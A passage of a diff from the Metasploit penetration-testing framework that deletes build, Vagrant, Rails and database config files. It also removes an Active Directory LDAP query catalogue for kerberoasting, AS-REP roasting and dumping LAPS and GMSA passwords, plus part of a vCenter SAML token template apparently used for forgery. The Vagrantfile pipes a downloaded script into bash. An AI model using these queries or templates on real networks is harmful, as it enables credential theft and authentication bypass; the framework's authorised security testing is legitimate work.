+	RSpec::Core::RakeTask.new(:spec => 'db:test:prepare')
+
+	task :default => :spec
+end
+
+# Require yard before loading metasploit_data_models rake tasks as the yard tasks won't be defined if
+# YARD is not defined when yard.rake is loaded.
+begin
+  require 'yard'
+rescue LoadError
+	puts "yard not in bundle, so can't set up yard tasks.  " \
+	     "To generate documentation ensure to install the development group."
+
+	print_without = true
+end
+
+begin
+	require 'metasploit_data_models'
+rescue LoadError
+	puts "metasploit_data_models not in bundle, so can't set up db tasks.  " \
+	     "To run database tasks, ensure to install the db bundler group."
+
+	print_without = true
+else
+	load 'lib/tasks/database.rake'
+	metasploit_data_models_task_glob = MetasploitDataModels.root.join(
+			'lib',
+			'tasks',
+			'**',
+			'*.rake'
+	).to_s
+	# include tasks from metasplioit_data_models, such as `rake yard`.
+	# metasploit-framework specific yard options are in .yardopts
+	Dir.glob(metasploit_data_models_task_glob) do |path|
+		load path
+	end
+end
+
+
+
+if print_without
+	puts "Bundle currently installed " \
+	     "'--without #{Bundler.settings.without.join(' ')}'."
+	puts "To clear the without option do `bundle install --without ''` " \
+	     "(the --without flag with an empty string) or " \
+	     "`rm -rf .bundle` to remove the .bundle/config manually and " \
+	     "then `bundle install`"
+end
@@ -1,57 +0,0 @@
-# -*- mode: ruby -*-
-# vi: set ft=ruby :
-
-display_name = "metasploit-framework"
-
-Vagrant.configure(2) do |config|
-  config.ssh.forward_x11 = true
-  config.vm.box = "hashicorp/bionic64" # https://app.vagrantup.com/hashicorp/boxes/bionic64
-  config.vm.network :forwarded_port, guest: 4444, host: 4444
-  config.vm.provider "vmware_desktop" do |v|
-	  v.memory = 2048
-	  v.cpus = 2
-    v.vmx['displayname'] = display_name
-    #v.gui = true # uncomment to show VM in your hypervisor's GUI
-  end
-  config.vm.provider "virtualbox" do |v|
-    v.name = display_name
-	  v.memory = 2048
-	  v.cpus = 2
-    #v.gui = true # uncomment to show VM in your hypervisor's GUI
-  end
-  %w(.vimrc .gitconfig).each do |f|
-    local = File.expand_path "~/#{f}"
-    if File.exist? local
-      config.vm.provision "file", source: local, destination: f
-    end
-  end
-
-  [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
-    "apt-get update",
-    "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
-  ].each do |step|
-    config.vm.provision "shell", inline: step
-  end
-
-  [ # use the rvm install method used in omnibus install
-    # only show stderr when gpg really fails. avoids superfluous stderr from gpg
-    'out=`curl -sSL https://rvm.io/mpapis.asc | gpg --import - 2>&1` && echo "imported mpapis.asc" || echo $out 1>&2',
-    'out=`curl -sSL https://rvm.io/pkuczynski.asc | gpg --import - 2>&1` && echo "imported pkuczynski.asc" || echo $out 1>&2',
-    'out=`curl -L -sSL https://get.rvm.io | bash -s stable 2>&1` && echo "rvm installed" || echo $out 1>&2',
-    # only install Ruby if the right version isn't already present
-    "echo 'Installing Ruby if necessary'",
-    'cd /vagrant && rv=`cat .ruby-version` && source ~/.rvm/scripts/rvm && rvm list strings | grep -q $rv || rvm install $rv',
-    'source ~/.rvm/scripts/rvm && cd /vagrant && gem install --quiet bundler && bundle',
-    'mkdir -p ~/.msf4',
-  ].each do |step|
-    config.vm.provision "shell", privileged: false, inline: step
-  end
-  config.vm.provision "file", source: "config/database.yml.vagrant", destination: "~/.msf4/database.yml"
-
-  config.vm.provision "shell", inline: "sudo -u postgres psql postgres -tAc \"SELECT 1 FROM pg_roles WHERE rolname='vagrant'\" | grep -q 1 || sudo -u postgres createuser -s -e -w vagrant && sudo -u postgres psql -c \"ALTER USER vagrant with ENCRYPTED PASSWORD 'vagrant';\""
-
-  ["msf_dev_db", "msf_test_db"].each do |database|
-    config.vm.provision "shell", inline: "sudo -u postgres psql -lqt | awk '{ print $1 }' | grep -w #{database} | wc -l | grep -q 1 || sudo -u postgres createdb --owner vagrant #{database}"
-  end
-end
@@ -1,82 +0,0 @@
-module Mdm::Workspace::BoundaryRange
-  extend ActiveSupport::Concern
-
-  included do
-    #
-    # Validations
-    #
-
-    validate :boundary_must_be_ip_range
-
-    #
-    # Instance Methods
-    #
-
-    # If {#limit_to_network} is disabled, this will always return `true`.
-    # Otherwise, return `true` only if all of the given IPs are within the
-    # project {#boundary boundaries}.
-
-    #
-    # @param ips [String] IP range(s)
-    # @return [true] if actions on ips are allowed.
-    # @return [false] if actions are not allowed on ips.
-    def allow_actions_on?(ips)
-      return true unless limit_to_network
-      return true unless boundary
-      return true if boundary.empty?
-      boundaries = Shellwords.split(boundary)
-      return true if boundaries.empty? # It's okay if there is no boundary range after all
-      given_range = Rex::Socket::RangeWalker.new(ips)
-      return false unless given_range # Can't do things to nonexistant IPs
-      allowed = false
-      boundaries.each do |boundary_range|
-        ok_range = Rex::Socket::RangeWalker.new(boundary)
-        allowed  = true if ok_range.include_range? given_range
-      end
-      return allowed
-    end
-
-    # Validates that {#boundary} is {#valid_ip_or_range? a valid IP address or
-    # IP address range}. Due to this not being tested before it was moved here
-    # from Mdm, the default workspace does not validate. We always validate boundaries
-    # and a workspace may have a blank default boundary.
-    #
-    # @return [void]
-    def boundary_must_be_ip_range
-      unless boundary.blank?
-        begin
-          boundaries = Shellwords.split(boundary)
-        rescue ArgumentError
-          boundaries = []
-        end
-
-        boundaries.each do |range|
-          unless valid_ip_or_range?(range)
-            errors.add(:boundary, "must be a valid IP range")
-          end
-        end
-      end
-    end
-
-    # Returns an array of addresses ranges
-    #
-    # @return [Array<String>]
-    def addresses
-      (boundary || "").split("\n")
-    end
-
-    private
-
-    # Returns whether `string` is a valid IP address or IP address range.
-    #
-    # @return [true] if valid IP address or IP address range.
-    # @return [false] otherwise.
-    def valid_ip_or_range?(string)
-      range = Rex::Socket::RangeWalker.new(string)
-      range && range.ranges && range.ranges.any?
-    end
-
-  end
-
-
-end
@@ -1,23 +0,0 @@
-# Adds associations to `Metasploit::Credential::Core` which are inverses of association on models under
-# {BruteForce::Reuse}.
-require 'metasploit/framework/credential'
-
-module Metasploit::Credential::Core::ToCredential
-  extend ActiveSupport::Concern
-  
-  included do
-    
-    def to_credential
-      Metasploit::Framework::Credential.new(
-        public:       public.try(:username) || '',
-        private:      private.try(:data)    || '',
-        private_type: private.try(:type).try(:demodulize).try(:underscore).try(:to_sym), 
-        realm:        realm.try(:value), 
-        realm_key:    realm.try(:key),
-        parent:       self
-      )
-    end
-    
-  end
-  
-end
@@ -1,5 +0,0 @@
-class ApplicationRecord < ActiveRecord::Base
-  self.abstract_class = true
-  include ArelHelpers::ArelTable
-  include ArelHelpers::JoinAssociation
-end
@@ -1,2 +0,0 @@
-require 'metasploit/framework/file_path_validator'
-require 'metasploit/framework/executable_path_validator'
@@ -1,16 +0,0 @@
-module Metasploit
-  module Framework
-    # This is a ActiveModel custom validator that assumes the attribute
-    # is supposed to be the path to a regular file. It checks whether the
-    # file exists and whether or not it is an executable file.
-    class ExecutablePathValidator < ActiveModel::EachValidator
-
-      def validate_each(record, attribute, value)
-        unless ::File.executable? value
-          record.errors.add(attribute, (options[:message] || "is not a valid path to an executable file"))
-        end
-      end
-    end
-  end
-end
-
@@ -1,16 +0,0 @@
-module Metasploit
-  module Framework
-    # This is a ActiveModel custom validator that assumes the attribute
-    # is supposed to be the path to a regular file. It checks whether the
-    # file exists and whether or not it is a regular file.
-    class FilePathValidator < ActiveModel::EachValidator
-
-      def validate_each(record, attribute, value)
-        unless value && ::File.file?(value)
-          record.errors.add(attribute, (options[:message] || "is not a valid path to a regular file"))
-        end
-      end
-    end
-  end
-end
-
@@ -1,58 +0,0 @@
-require 'fiddle'
-Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
-
-require 'rails'
-require File.expand_path('../boot', __FILE__)
-
-all_environments = [
-    :development,
-    :production,
-    :test
-]
-
-Bundler.require(
-    *Rails.groups(
-        coverage: [:test],
-        db: all_environments,
-        pcap: all_environments
-    )
-)
-
-#
-# Railties
-#
-
-# For compatibility with jquery-rails (and other engines that need action_view) in pro
-require 'action_controller/railtie'
-require 'action_view/railtie'
-
-#
-# Project
-#
-
-require 'metasploit/framework/common_engine'
-require 'metasploit/framework/database'
-module Metasploit
-  module Framework
-    class Application < Rails::Application
-      include Metasploit::Framework::CommonEngine
-
-      config.paths['log']             = "#{Msf::Config.log_directory}/#{Rails.env}.log"
-      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
-      config.autoloader = :zeitwerk
-
-      case Rails.env
-      when "development"
-        config.eager_load = false
-      when "test"
-        config.eager_load = false
-      when "production"
-        config.eager_load = true
-      end
-    end
-  end
-end
-
-# Silence warnings about this defaulting to true
-I18n.enforce_available_locales = true
-require 'msfenv'
@@ -1,40 +0,0 @@
-require 'pathname'
-require 'rubygems'
-
-GEMFILE_EXTENSIONS = [
-    '.local',
-    ''
-]
-
-msfenv_real_pathname = Pathname.new(__FILE__).realpath
-root = msfenv_real_pathname.parent.parent
-
-unless ENV['BUNDLE_GEMFILE']
-  require 'pathname'
-
-  GEMFILE_EXTENSIONS.each do |extension|
-    extension_pathname = root.join("Gemfile#{extension}")
-
-    if extension_pathname.readable?
-      ENV['BUNDLE_GEMFILE'] = extension_pathname.to_path
-      break
-    end
-  end
-end
-
-begin
-  require 'bundler/setup'
-rescue LoadError => e
-  $stderr.puts "[*] Bundler failed to load and returned this error:"
-  $stderr.puts
-  $stderr.puts "   '#{e}'"
-  $stderr.puts
-  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
-  exit(1)
-end
-
-lib_path = root.join('lib').to_path
-
-unless $LOAD_PATH.include? lib_path
-  $LOAD_PATH.unshift lib_path
-end
@@ -1,11 +0,0 @@
-<%
-rerun = File.file?('rerun.txt') ? IO.read('rerun.txt') : ""
-rerun_opts = rerun.to_s.strip.empty? ? "--format #{ENV['CUCUMBER_FORMAT'] || 'progress'} features" : "--format #{ENV['CUCUMBER_FORMAT'] || 'pretty'} #{rerun}"
-std_opts = "--format #{ENV['CUCUMBER_FORMAT'] || 'pretty'} --strict --tags ~@wip"
-ignored_tags = "--tags ~@boot --tags ~@targets"
-%>
-default: <%= std_opts %> <%= ignored_tags %> features
-boot: <%= std_opts %> --tags @boot features
-exploit: <%= std_opts %> --tags @targets features
-wip: --tags @wip:3 --wip features
-rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip
@@ -1,9 +1,10 @@
-# To set up a metasploit database, follow the directions hosted at:
-# http://r-7.co/MSF-DEV#set-up-postgresql
+# Please only use postgresql bound to a TCP port.
+# Only postgresql is supportable for metasploit-framework
+# these days. (No SQLite, no MySQL).
 #
-# Kali Linux and the Omnibus installers both include an easy wrapper script for
-# managing your database, which may be more convenient than rolling your own.
-
+# To set up a metasploit database, follow the directions hosted at:
+# https://fedoraproject.org/wiki/Metasploit_Postgres_Setup (Works on
+# essentially any Linux distro, not just Fedora)
 development: &pgsql
  adapter: postgresql
  database: metasploit_framework_development
@@ -11,7 +12,7 @@ development: &pgsql
  password: __________________________________
  host: localhost
  port: 5432
-  pool: 200
+  pool: 5
  timeout: 5

 # You will often want to seperate your databases between dev
@@ -1,25 +0,0 @@
-# @note This file is only for use in GitHub Actions.  If you need to make a
-# config/database.yml for running rake, rake spec, or rspec locally, please
-# customize `conifg/database.yml.example`
-#
-# @example Customizing config/database.yml.example
-#   cp config/database.yml.example config/database.yml
-#   # update password fields for each environment's user
-
-development: &pgsql
-  adapter: postgresql
-  database: metasploit_framework_development
-  host: localhost
-  username: postgres
-  password: postgres
-  pool: 25
-  timeout: 5
-
-# Warning: The database defined as "test" will be erased and
-# re-generated from your development database when you run "rake".
-# Do not set this db to the same as development or production.
-#
-# Note also, sqlite3 is totally unsupported by Metasploit now.
-test:
-  <<: *pgsql
-  database: metasploit_framework_test
@@ -0,0 +1,27 @@
+# @note This file is only for use in travis-ci.  If you need to make a
+# config/database.yml for running rake, rake spec, or rspec locally, please
+# customize `conifg/database.yml.example`
+#
+# @example Customizing config/database.yml.example
+#   cp config/database.yml.example config/database.yml
+#   # update password fields for each environment's user
+
+# Using the postgres user locally without a host and port is the supported
+# configuration from Travis-CI
+#
+# @see http://about.travis-ci.org/docs/user/database-setup/#PostgreSQL
+development: &pgsql
+  adapter: postgresql
+  database: metasploit_framework_development
+  username: postgres
+  pool: 5
+  timeout: 5
+
+# Warning: The database defined as "test" will be erased and
+# re-generated from your development database when you run "rake".
+# Do not set this db to the same as development or production.
+#
+# Note also, sqlite3 is totally unsupported by Metasploit now.
+test:
+  <<: *pgsql
+  database: metasploit_framework_test
@@ -1,18 +0,0 @@
-development: &pgsql
-  adapter: postgresql
-  database: msf_dev_db
-  username: vagrant
-  password: vagrant
-  host: localhost
-  port: 5432
-  pool: 200
-  timeout: 5
-
-production: &production
-  <<: *pgsql
-
-test:
-  <<: *pgsql
-  database: msf_test_db
-  username: vagrant
-  wassword: vagrant
@@ -1,4 +0,0 @@
-# Load the rails application
-require File.expand_path('../application', __FILE__)
-# Initialize the rails application
-Metasploit::Framework::Application.initialize!
@@ -1,5 +0,0 @@
-if defined? Metasploit::Framework::Application
-  Metasploit::Framework::Application.configure do
-    config.log_level = :info
-  end
-end
@@ -1,14 +0,0 @@
-openssl_conf = openssl_init
-
-[openssl_init]
-providers = provider_sect
-
-[provider_sect]
-default = default_sect
-legacy = legacy_sect
-
-[default_sect]
-activate = 1
-
-[legacy_sect]
-activate = 1
@@ -1,352 +0,0 @@
---
-queries:
-  - action: ENUM_ACCOUNTS
-    description: 'Dump info about all known user accounts in the domain.'
-    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368)(objectcategory=user)(objectClass=user))'
-    attributes:
-      - dn
-      - name
-      - description
-      - displayName
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-      - homeDirectory
-      - homeDrive
-      - profilePath
-      - memberof
-      - lastLogoff
-      - lastLogon
-      - lastLogonDate
-      - logonCount
-      - badPwdCount
-      - pwdLastSet
-      - SmartcardLogonRequired
-      - LastBadPasswordAttempt
-      - PasswordLastSet
-      - PaswordNeverExpires
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_ADCS_CAS
-    description: 'Enumerate ADCS certificate authorities.'
-    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
-    filter: '(objectClass=pKIEnrollmentService)'
-    attributes:
-      - cn
-      - name
-      - cACertificateDN
-      - dNSHostname
-      - certificateTemplates
-      - objectGUID
-      - caCertificate
-    references:
-      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
-  - action: ENUM_ADCS_CERT_TEMPLATES
-    description: 'Enumerate ADCS certificate templates.'
-    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
-    filter: '(objectClass=pkicertificatetemplate)'
-    attributes:
-      - cn
-      - name
-      - displayName
-      - msPKI-Cert-Template-OID
-      - msPKI-Template-Schema-Version
-      - msPKI-Enrollment-Flag
-      - msPKI-Certificate-Name-Flag
-      - msPKI-Private-Key-Flag
-      - msPKI-RA-Signature
-      - pKIExtendedKeyUsage
-    references:
-      - https://web.archive.org/web/20220818094600if_/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf
-  - action: ENUM_ADMIN_OBJECTS
-    description: 'Dump info about all objects with protected ACLs (i.e highly privileged objects).'
-    filter: '(adminCount=1)'
-    attributes:
-      - dn
-      - description
-      - distinguishedName
-      - name
-      - samAccountName
-      - objectSID
-      - objectGUID
-      - objectCategory
-      - member
-      - memberof
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-  - action: ENUM_ALL_OBJECT_CATEGORY
-    description: 'Dump all objects containing any objectCategory field.'
-    filter: '(objectCategory=*)'
-    attributes:
-      - dn
-      - objectCategory
-  - action: ENUM_ALL_OBJECT_CLASS
-    description: 'Dump all objects containing any objectClass field.'
-    filter: '(objectClass=*)'
-    attributes:
-      - dn
-      - objectClass
-  - action: ENUM_COMPUTERS
-    description: 'Dump all objects containing an objectCategory or objectClass of Computer.'
-    filter: '(|(objectCategory=computer)(objectClass=computer))'
-    attributes:
-      - dn
-      - displayName
-      - distinguishedName
-      - dNSHostName
-      - description
-      - givenName
-      - name
-      - operatingSystem
-      - operatingSystemVersion
-      - operatingSystemServicePack
-      - lastLogonTimestamp
-      - servicePrincipalName
-      - primaryGroupId
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_CONSTRAINED_DELEGATION
-    description: 'Dump info about all known objects that allow contrained delegation.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16777216)'
-    attributes:
-      - cn
-      - sAMAccountName
-      - objectCategory
-      - msds-allowedtodelegateto
-      - servicePrincipalName
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation
-  - action: ENUM_DNS_RECORDS
-    description: 'Dump info about DNS records the server knows about using the dnsNode object class.'
-    filter: '(objectClass=dnsNode)'
-    attributes:
-      - dc
-      - cn
-      - dnsRecord
-      - dnsTombstoned
-      - name
-    references:
-      - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
-      - https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
-  - action: ENUM_DNS_ZONES
-    description: 'Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed as without this BASEDN prefix we often miss certain entries.'
-    filter: '(objectClass=dnsZone)'
-    base_dn_prefix: 'DC=DomainDnsZones'
-    attributes:
-      - name
-      - distinguishedName
-    references:
-      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
-  - action: ENUM_DOMAIN_CONTROLLERS
-    description: 'Dump all known domain controllers.'
-    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
-    attributes:
-      - dn
-      - displayName
-      - distinguishedName
-      - dNSHostName
-      - description
-      - givenName
-      - name
-      - operatingSystem
-      - operatingSystemVersion
-      - operatingSystemServicePack
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf 
-  - action: ENUM_EXCHANGE_RECIPIENTS
-    description: 'Dump info about all known Exchange recipients.'
-    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
-    attributes:
-      - dn
-      - mailNickname
-      - proxyAddresses
-      - name
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-  - action: ENUM_EXCHANGE_SERVERS
-    description: 'Dump info about all known Exchange servers.'
-    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
-    attributes:
-      - dn
-      - displayName
-      - distinguishedName
-      - dNSHostName
-      - description
-      - givenName
-      - name
-      - operatingSystem
-      - operatingSystemVersion
-      - operatingSystemServicePack
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_GMSA_HASHES
-    description: 'Dump info about GMSAs and their password hashes if available.'
-    filter: '(objectClass=msDS-GroupManagedServiceAccount)'
-    attributes:
-      - cn
-      - displayName
-      - msDS-ManagedPassword
-    references:
-      - https://stealthbits.com/blog/securing-gmsa-passwords/
-      - https://o365blog.com/post/gmsa/
-      - https://adsecurity.org/?p=4367
-  - action: ENUM_GROUPS
-    description: 'Dump info about all known groups in the LDAP environment.'
-    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup)(objectcategory=group))'
-    attributes:
-      - cn
-      - name
-      - description
-      - groupType
-      - memberof
-      - member
-      - owner
-      - adminCount
-      - managedBy
-      - groupAttributes
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-  - action: ENUM_GROUP_POLICY_OBJECTS
-    description: 'Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.'
-    filter: '(objectClass=groupPolicyContainer)'
-    attributes:
-      - displayName
-      - gPCFileSysPath
-      - objectCategory
-      - objectGUID
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-  - action: ENUM_HOSTNAMES
-    description: 'Dump info about all known hostnames in the LDAP environment.'
-    filter: '(dnsHostName=*)'
-    attributes:
-      - dn
-      - name
-      - dnsHostName
-      - serverName
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 
-  - action: ENUM_LAPS_PASSWORDS
-    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
-    filter: '(ms-MCS-AdmPwd=*)'
-    attributes:
-      - cn
-      - displayName
-      - ms-MCS-AdmPwd
-    references:
-      - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ldap-ldaps
-  - action: ENUM_LDAP_SERVER_METADATA
-    description: 'Dump metadata about the setup of the domain.'
-    filter: '(objectClass=*)'
-    attributes:
-      - dn
-      - defaultNamingContext
-      - domainFunctionality
-      - forestFunctionality
-      - domainControllerFunctionality
-      - dnsHostName
-    references:
-      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-  - action: ENUM_ORGROLES
-    description: 'Dump info about all known organization roles in the LDAP environment.'
-    filter: '(objectClass=organizationalRole)'
-    attributes:
-      - displayName
-      - name
-      - description
-  - action: ENUM_ORGUNITS
-    description: 'Dump info about all known organizational units in the LDAP environment.'
-    filter: '(objectClass=organizationalUnit)'
-    attributes:
-      - displayName
-      - name
-      - description
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-  - action: ENUM_UNCONSTRAINED_DELEGATION
-    description: 'Dump info about all known objects that allow uncontrained delegation.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
-    attributes:
-      - cn
-      - sAMAccountName
-      - objectCategory
-      - memberof
-      - member
-    references:
-      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_ACCOUNT_DISABLED
-    description: 'Dump info about disabled user accounts.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=2)'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-  - action: ENUM_USER_ACCOUNT_LOCKED_OUT
-    description: 'Dump info about locked out user accounts.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16)'
-    attributes:
-      - cn
-      - displayName
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_ASREP_ROASTABLE
-    description: 'Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.'
-    filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://burmat.gitbook.io/security/hacking/domain-exploitation
-  - action: ENUM_USER_PASSWORD_NEVER_EXPIRES
-    description: 'Dump info about all users whose password never expires.'
-    filter: '(userAccountControl:1.2.840.113556.1.4.803:=65536)'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_PASSWORD_NOT_REQUIRED
-    description: 'Dump info about all users whose password never expires and whose account is still enabled.'
-    filter: '(&(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
-    attributes:
-      - cn
-      - displayName
-      - description
-      - sAMAccountName
-      - userPrincipalName
-      - userAccountControl
-    references:
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
-  - action: ENUM_USER_SPNS_KERBEROAST
-    description: 'Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.'
-    filter: '(&(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
-    attributes:
-      - cn
-      - sAMAccountName
-      - servicePrincipalName
-    references:
-      - https://malicious.link/post/2022/ldapsearch-reference/
-      - https://burmat.gitbook.io/security/hacking/domain-exploitation
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties 
@@ -1,9 +0,0 @@
---
-queries:
-#  - action: SAMPLE_ACTION
-#    description: 'A description.'
-#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
-#    filter: '(objectClass=*)'
-#    attributes:
-#      - dn
-#      - objectClass
@@ -1,55 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/sso" ID="_<%= vcenter_saml_response_id.encode(xml: :text) %>" InResponseTo="<%= vcenter_saml_id.encode(xml: :text) %>" IssueInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" Version="2.0">
-    <saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://<%= vcenter_fqdn.encode(xml: :text) %>/websso/SAML2/Metadata/<%= vcenter_saml_domain.encode(xml: :text) %></saml2:Issuer>
-    <saml2p:Status>
-        <saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
-        <saml2p:StatusMessage>Request successful</saml2p:StatusMessage>
-    </saml2p:Status>
-    <saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ID="_<%= vcenter_saml_assert_id.encode(xml: :text) %>" IssueInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" Version="2.0">
-        <saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://<%= vcenter_fqdn.encode(xml: :text) %>/websso/SAML2/Metadata/<%= vcenter_saml_domain.encode(xml: :text) %></saml2:Issuer>
-        <saml2:Subject>
-            <saml2:NameID Format="http://schemas.xmlsoap.org/claims/UPN"><%= vcenter_saml_user.encode(xml: :text) %>@<%= vcenter_saml_domain.encode(xml: :text) %></saml2:NameID>
-            <saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
-                <saml2:SubjectConfirmationData InResponseTo="<%= vcenter_saml_id.encode(xml: :text) %>" NotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>" Recipient="https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/sso"/>
-            </saml2:SubjectConfirmation>
-        </saml2:Subject>
-        <saml2:Conditions NotBefore="<%= vcenter_saml_not_before.encode(xml: :text) %>" NotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>">
-            <saml2:ProxyRestriction Count="10"/>
-            <saml2:Condition xmlns:rsa="http://www.rsa.com/names/2009/12/std-ext/SAML2.0" Count="10" xsi:type="rsa:RenewRestrictionType"/>
-            <saml2:AudienceRestriction>
-                <saml2:Audience>https://<%= vcenter_fqdn.encode(xml: :text) %>/ui/saml/websso/metadata</saml2:Audience>
-            </saml2:AudienceRestriction>
-        </saml2:Conditions>
-        <saml2:AuthnStatement AuthnInstant="<%= vcenter_saml_issue.encode(xml: :text) %>" SessionIndex="_<%= vcenter_saml_idx_id.encode(xml: :text) %>" SessionNotOnOrAfter="<%= vcenter_saml_not_after.encode(xml: :text) %>">
-            <saml2:AuthnContext>
-                <saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef>
-            </saml2:AuthnContext>
-        </saml2:AuthnStatement>
-        <saml2:AttributeStatement>
-            <saml2:Attribute FriendlyName="userPrincipalName" Name="http://schemas.xmlsoap.org/claims/UPN" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_user.encode(xml: :text) %>@<%= vcenter_saml_domain.encode(xml: :text) %></saml2:AttributeValue>
-            </saml2:Attribute>
-            <saml2:Attribute FriendlyName="Groups" Name="http://rsa.com/schemas/attr-names/2009/01/GroupIdentity" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
-                <saml2:AttributeValue xsi:type="xsd:string"><%= vcenter_saml_domain.encode(xml: :text) %>\Users</saml2:AttributeValue>
